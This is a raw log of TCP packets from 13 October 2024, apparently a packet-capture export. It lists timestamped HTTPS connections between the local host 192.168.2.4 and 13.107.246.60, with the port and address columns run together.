                                                                                                                          Oct 13, 2024 18:21:48.483275890 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.483901024 CEST49875443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.483915091 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.707515955 CEST4434987313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.707549095 CEST4434987313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.707595110 CEST4434987313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.707609892 CEST49873443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.707649946 CEST49873443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.707685947 CEST4434987213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.707842112 CEST4434987213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.707921028 CEST49872443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.708149910 CEST49873443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.708164930 CEST4434987313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.708205938 CEST49873443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.708210945 CEST4434987313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.708219051 CEST4434987413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.708364010 CEST4434987413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.708412886 CEST49874443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.710995913 CEST49874443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.711004972 CEST4434987413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.713958025 CEST49872443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.713995934 CEST4434987213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.714024067 CEST49872443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.714040041 CEST4434987213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.718827009 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.718858004 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.719057083 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.722775936 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.722785950 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.722881079 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.723279953 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.723290920 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.726030111 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.726063967 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.726185083 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.726645947 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.726656914 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.726826906 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.726843119 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.804725885 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.805404902 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.805511951 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.805537939 CEST49875443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.805586100 CEST49875443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.805665016 CEST49875443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.805665016 CEST49875443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.805691957 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.805721998 CEST4434987513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.807722092 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.807811022 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:48.807903051 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.808058977 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:48.808095932 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.062509060 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.063067913 CEST49876443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.063091993 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.063714027 CEST49876443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.063719988 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.162544012 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.163146019 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.163207054 CEST49876443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.163238049 CEST49876443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.163252115 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.163269997 CEST49876443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.163275003 CEST4434987613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.166666985 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.166699886 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.166765928 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.166919947 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.166929960 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.371232033 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.375287056 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.375308990 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.377788067 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.377796888 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.382632971 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.383579969 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.383608103 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.385464907 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.385472059 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.420809031 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.421469927 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.421490908 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.422421932 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.422427893 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.464535952 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.468451977 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.468472004 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.469058037 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.469063044 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.476684093 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.476763964 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.476910114 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.477056980 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.477076054 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.477086067 CEST49877443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.477091074 CEST4434987713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.479890108 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.479928970 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.480149984 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.480324984 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.480339050 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.484101057 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.484174967 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.484221935 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.484236002 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.484282970 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.484338999 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.484361887 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.484373093 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.484381914 CEST49879443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.484386921 CEST4434987913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.486351967 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.486377954 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.486654043 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.486745119 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.486752033 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.760734081 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.760828018 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.760885000 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.760940075 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.761017084 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.761084080 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.761183977 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.761210918 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.761236906 CEST49878443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.761245012 CEST4434987813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.761436939 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.761456013 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.761466026 CEST49880443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.761471987 CEST4434988013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.765121937 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.765203953 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.765254974 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.765314102 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.765326023 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.765455008 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.765588045 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.765623093 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.765665054 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.765695095 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.953038931 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.953696966 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.953708887 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:49.954433918 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:49.954438925 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.055288076 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.055481911 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.055552959 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.055679083 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.055699110 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.055712938 CEST49881443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.055718899 CEST4434988113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.058711052 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.058783054 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.058871984 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.059082031 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.059111118 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.178057909 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.178504944 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.178517103 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.178900003 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.178904057 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.180577993 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.180980921 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.181005955 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.181544065 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.181548119 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285044909 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285075903 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285109997 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285145044 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285171986 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285223007 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285232067 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285248995 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285295010 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285351038 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285367966 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285376072 CEST49883443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285381079 CEST4434988313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285610914 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285631895 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.285644054 CEST49882443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.285649061 CEST4434988213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.288418055 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.288500071 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.288611889 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.288722038 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.288744926 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.289145947 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.289165974 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.289413929 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.289570093 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.289592981 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.418279886 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.418848991 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.418889999 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.419261932 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.419271946 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.431780100 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.432363033 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.432411909 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.432655096 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.432671070 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.518727064 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.518891096 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.518959045 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.519151926 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.519186020 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.519212961 CEST49885443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.519227028 CEST4434988513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.522501945 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.522542953 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.522620916 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.522842884 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.522886992 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.533797979 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.533828020 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.533879042 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.534024000 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.534024000 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.534024000 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.534024000 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.536691904 CEST49890443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.536719084 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.536803961 CEST49890443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.536983967 CEST49890443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.537010908 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.715001106 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.715559006 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.715595961 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.715962887 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.715975046 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.842219114 CEST49884443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.842277050 CEST4434988413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.844055891 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.844212055 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.844364882 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.844398022 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.844415903 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.844429970 CEST49886443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.844435930 CEST4434988613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.847352028 CEST49891443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.847423077 CEST4434989113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.847505093 CEST49891443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.847673893 CEST49891443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.847693920 CEST4434989113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.940632105 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.941150904 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.941217899 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.941766977 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.941781044 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.944848061 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.945240021 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.945270061 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:50.945590973 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:50.945600986 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.041228056 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.041461945 CEST4434988713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.041634083 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.041634083 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.041634083 CEST49887443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.044509888 CEST49892443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.044548035 CEST4434989213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.044620037 CEST49892443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.044858932 CEST49892443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.044873953 CEST4434989213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.049283028 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.049427986 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.049489021 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.049902916 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.049925089 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.049936056 CEST49888443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.049941063 CEST4434988813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.057491064 CEST49893443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.057521105 CEST4434989313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.057589054 CEST49893443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.057745934 CEST49893443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.057760954 CEST4434989313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.182826996 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.183402061 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.183434963 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.183998108 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.184003115 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.201395035 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.201827049 CEST49890443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.201843977 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.202161074 CEST49890443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.202167034 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.282932997 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.282999992 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.283063889 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.283097982 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.283134937 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.283185959 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.283185959 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.283221960 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.285778999 CEST49894443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.285809040 CEST4434989413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.285895109 CEST49894443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.286046982 CEST49894443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.286057949 CEST4434989413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.296392918 CEST49889443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.296402931 CEST4434988913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.311693907 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.311753035 CEST4434989013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:51.311810017 CEST49890443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:51.312071085 CEST49890443192.168.2.413.107.246.60
